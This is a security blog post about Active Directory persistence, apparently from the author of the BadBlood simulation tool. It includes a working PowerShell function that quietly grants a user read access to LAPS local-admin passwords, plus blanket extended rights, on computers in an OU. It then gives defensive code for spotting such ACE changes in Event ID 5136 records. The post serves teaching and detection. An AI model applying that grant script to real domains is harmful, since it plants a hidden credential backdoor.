Persistence is a standard way for attackers to keep a foothold inside a target system. "Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access." (MITRE ATT&CK, Persistence tactic)

"Permissions applied in milliseconds?" What does that mean for an environment that has experienced a compromise?

Every security product or system has its own ways for an attacker to establish persistence and remain in control. Attackers use persistence so they can return to the system later and keep their administrative privileges.

I designed the first release of BadBlood to simulate random Active Directory persistence attacks. The attacks applied in the first release include:

- LAPS read access
- ServicePrincipalName control
- Derivative domain admin
- DCSync privileges
- GPO permission delegation

If you decide to test BadBlood, you can run the full domain import or just a segment of the tool. If you run all the scripts, notice that full creation of the domain (OUs, users, groups, computers, permissions and group memberships) takes 30+ minutes. If you test only the part of the script that applies permissions, you'll notice the permissions apply in seconds.

"Permissions applied in seconds." What does that mean for an environment that has been compromised?

An attacker can implant a persistence method in Active Directory in a matter of seconds.

If you are breached and you know the attacker gained access to a highly privileged group, the attacker may have implanted a subversive method to hide in your domain even if they only had access for minutes.

BadBlood currently applies persistence attacks randomly: random users get random permissions on random OUs. If I were an attacker, I could apply any of these persistence attacks to a domain in under 10 seconds.

My last few posts are on LAPS, so I'll start by simulating a LAPS persistence attack.

I can add LAPS permissions to the domain in under one second. Literally 396 milliseconds. Attackers can have a backdoor into your domain in under 400 ***MILLI***seconds! That's 4/10ths of a second!

"But the attacker was only in my system for 4 minutes! It's ok!"

Is it? Is it really? I can add a smorgasbord of backdoors in 4 minutes.

Boomsauce Below:

function ApplyPersistenceLAPS {
    # The ActiveDirectory module supplies the Get-AD* cmdlets and the AD: drive that Get-Acl/Set-Acl use below
    Import-Module ActiveDirectory
    cd ad:

    ## Create guidmap for acl functions
    #Get a reference to the RootDSE of the current domain
    $schemaPath = Get-ADRootDSE

    #Get a reference to the current domain
    $domain = Get-ADDomain

    #Create a hashtable to store the GUID value of each schema class and attribute
    $guidmap = @{ }
    Get-ADObject -SearchBase $schemaPath.SchemaNamingContext -LDAPFilter "(schemaidguid=*)" -Properties lDAPDisplayName, schemaIDGUID |
        ForEach-Object { $guidmap[$_.lDAPDisplayName] = [System.Guid]$_.schemaIDGUID }

    #Create a hashtable to store the GUID value of each extended right in the forest
    #(built for completeness; the LAPS grant below only needs $guidmap)
    $extendedrightsmap = @{ }
    Get-ADObject -SearchBase $schemaPath.ConfigurationNamingContext -LDAPFilter "(&(objectclass=controlAccessRight)(rightsguid=*))" -Properties displayName, rightsGuid |
        ForEach-Object { $extendedrightsmap[$_.displayName] = [System.Guid]$_.rightsGuid }

    Function ReadComputerAdmPwd($objGroup, $objOU, $inheritanceType)
    {
        $error.Clear()
        #Any principal with a SID works here; the call at the bottom passes a user, not a group
        $groupSID = New-Object System.Security.Principal.SecurityIdentifier $objGroup.SID
        $ouPath = "AD:\" + $objOU.DistinguishedName
        $objAcl = Get-Acl -Path $ouPath

        #ACE 1: ReadProperty on ms-Mcs-AdmPwd, inherited by descendant computer objects
        $objAcl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $groupSID, "ReadProperty", "Allow", $guidmap["ms-Mcs-AdmPwd"], $inheritanceType, $guidmap["computer"]))

        #ACE 2: ExtendedRight (control access) on descendant computer objects. Control access is what
        #lets a confidential attribute like ms-Mcs-AdmPwd be read; with no object GUID this ACE covers
        #every extended right on those computers, which is broader than the one attribute
        $objAcl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $groupSID, "ExtendedRight", "Allow", $inheritanceType, $guidmap["computer"]))

        try
        {
            Set-Acl -AclObject $objAcl -Path $ouPath
        }
        catch
        {
            Write-Host -ForegroundColor Red ("ERROR: Unable to grant the group " + $objGroup.Name + " permissions to read local administrator password on OU " + $objOU)
        }

        If (!$error)
        {
            Write-Host -ForegroundColor Green ("INFORMATION: Granted the group " + $objGroup.Name + " permissions to read local administrator password on OU " + $objOU)
        }
    }

    $user = Get-ADUser lillie_gardner
    $ou = Get-ADOrganizationalUnit 'OU=TEMP,OU=LAPS Testing,DC=badblood,DC=com'
    #Descendents = ContainerInherit + InheritOnly: the OU itself gets nothing, its children do
    $in = 'Descendents'
    ReadComputerAdmPwd -objGroup $user -objOU $ou -inheritanceType $in
}

ApplyPersistenceLAPS

Just because this code may be new to you doesn't mean it isn't already in the hands of well-funded attackers.

It is not as simple to reverse the effects of an attacker. If you happen to have AD auditing on, and if you happen to audit permission changes on all sub-OUs (guide here), searching for these events in real time or post-incident is mundane and tiresome.

The alert identifies no specific permissions. The record shows a very generic event (Event ID 5136):

Category: Directory Service Changes
Description: A directory service object was modified.

Here is the event generated on the DC (download link; embedded text below):

Good luck finding useful information quickly in this text blob.
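Since the 5136 record only says "a directory service object was modified", the useful information is in the attribute values it carries: the old and new nTSecurityDescriptor, written in SDDL. What follows is an added example, not BadBlood code and not part of the original post, that diffs those two descriptors and names the ACEs that appeared, flagging the two the script above writes. The trustee SID, the ms-Mcs-AdmPwd GUID (a placeholder; the real schemaIDGUID comes from $guidmap) and the SDDL strings are constructed so the example runs on any Windows machine without a domain; only the computer class GUID is the standard schema value.

```powershell
# Added example, not BadBlood or the post's own code: diff the before/after nTSecurityDescriptor
# values that event 5136 records for an OU and name the ACEs an attacker added.
Add-Type -AssemblyName System.DirectoryServices

function ConvertFrom-AdSddl {
    # Parse an nTSecurityDescriptor value in SDDL form into ActiveDirectoryAccessRule objects
    param([string]$Sddl)
    $sec = New-Object System.DirectoryServices.ActiveDirectorySecurity
    $sec.SetSecurityDescriptorSddlForm($Sddl)
    $sec.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
}

function Get-AceKey {
    # One string per ACE so the old and new descriptors can be compared as sets
    param($Rule)
    '{0}|{1}|{2}|{3}|{4}|{5}' -f $Rule.IdentityReference.Value, $Rule.ActiveDirectoryRights,
        $Rule.AccessControlType, $Rule.ObjectType, $Rule.InheritedObjectType, $Rule.InheritanceType
}

function Resolve-SchemaGuid {
    # Map a schemaIDGUID back to its lDAPDisplayName; an empty GUID means "all attributes/classes"
    param([guid]$Guid, [hashtable]$Names)
    if ($Guid -eq [guid]::Empty) { return 'all' }
    if ($Names.ContainsKey($Guid.ToString())) { return $Names[$Guid.ToString()] }
    return $Guid.ToString()
}

function Get-AddedAces {
    # Return the ACEs present in the new descriptor but absent from the old one.
    # LapsRead is true for a grant on ms-Mcs-AdmPwd itself or for a blanket extended-rights
    # (control access) grant, which is what the second ACE in ApplyPersistenceLAPS hands out.
    param([string]$OldSddl, [string]$NewSddl, [hashtable]$GuidMap)
    $names = @{}
    foreach ($k in $GuidMap.Keys) { $names[$GuidMap[$k].ToString()] = $k }
    $before = @{}
    foreach ($r in ConvertFrom-AdSddl $OldSddl) { $before[(Get-AceKey $r)] = $true }
    foreach ($r in ConvertFrom-AdSddl $NewSddl) {
        if ($before.ContainsKey((Get-AceKey $r))) { continue }
        $extended = $r.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)
        [pscustomobject]@{
            Trustee     = $r.IdentityReference.Value
            Rights      = $r.ActiveDirectoryRights.ToString()
            Attribute   = Resolve-SchemaGuid $r.ObjectType $names
            AppliesTo   = Resolve-SchemaGuid $r.InheritedObjectType $names
            Inheritance = $r.InheritanceType.ToString()
            LapsRead    = ($r.ObjectType -eq $GuidMap['ms-Mcs-AdmPwd']) -or ($extended -and $r.ObjectType -eq [guid]::Empty)
        }
    }
}

# Constructed sample input. The ms-Mcs-AdmPwd GUID is a placeholder (take the real one from the
# $guidmap the post's script builds), bf967a86-... is the schemaIDGUID of the computer class, and
# the trustee SID is made up. Only built-in aliases (BA, AU) appear so the SDDL parses off-domain.
$sampleGuidMap = @{
    'ms-Mcs-AdmPwd' = [guid]'11111111-1111-1111-1111-111111111111'
    'computer'      = [guid]'bf967a86-0de6-11d0-a285-00aa003049e2'
}
$trustee = 'S-1-5-21-1004336348-1177238915-682003330-1105'
$oldSddl = 'O:BAG:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;AU)'
# The two ACEs ApplyPersistenceLAPS adds: RP (ReadProperty) on ms-Mcs-AdmPwd and CR (all extended
# rights), both inherit-only onto descendant computer objects (CI + IO = Descendents)
$newSddl = $oldSddl +
    "(OA;CIIO;RP;11111111-1111-1111-1111-111111111111;bf967a86-0de6-11d0-a285-00aa003049e2;$trustee)" +
    "(OA;CIIO;CR;;bf967a86-0de6-11d0-a285-00aa003049e2;$trustee)"

Get-AddedAces -OldSddl $oldSddl -NewSddl $newSddl -GuidMap $sampleGuidMap | Format-Table -AutoSize

# Against a live DC the two SDDL strings come from event 5136. A DACL change is logged as a pair of
# events sharing an OpCorrelationID: one with OperationType "Value Deleted" (the old
# nTSecurityDescriptor) and one with "Value Added" (the new one). For example:
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136 } |
#     ForEach-Object { ([xml]$_.ToXml()).Event.EventData.Data }
# and read AttributeLDAPDisplayName, OperationType and AttributeValue from each event.
```

The diff is what makes the generic event useful: instead of reading a 2 KB SDDL string by eye, you get two rows, one ReadProperty on ms-Mcs-AdmPwd and one ExtendedRight on everything, both applying to descendant computers and both flagged LapsRead. The blanket extended-rights ACE is worth treating as its own finding, since it covers far more than reading the LAPS password.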

I'll dive into additional persistence attacks in later posts and help you identify, eradicate, and block these attacks in your Active Directory. For more information on identifying legacy permission snafus, or to obtain training tailored to your Active Directory environment, please see my services page or reach out to me to learn about the training services I provide.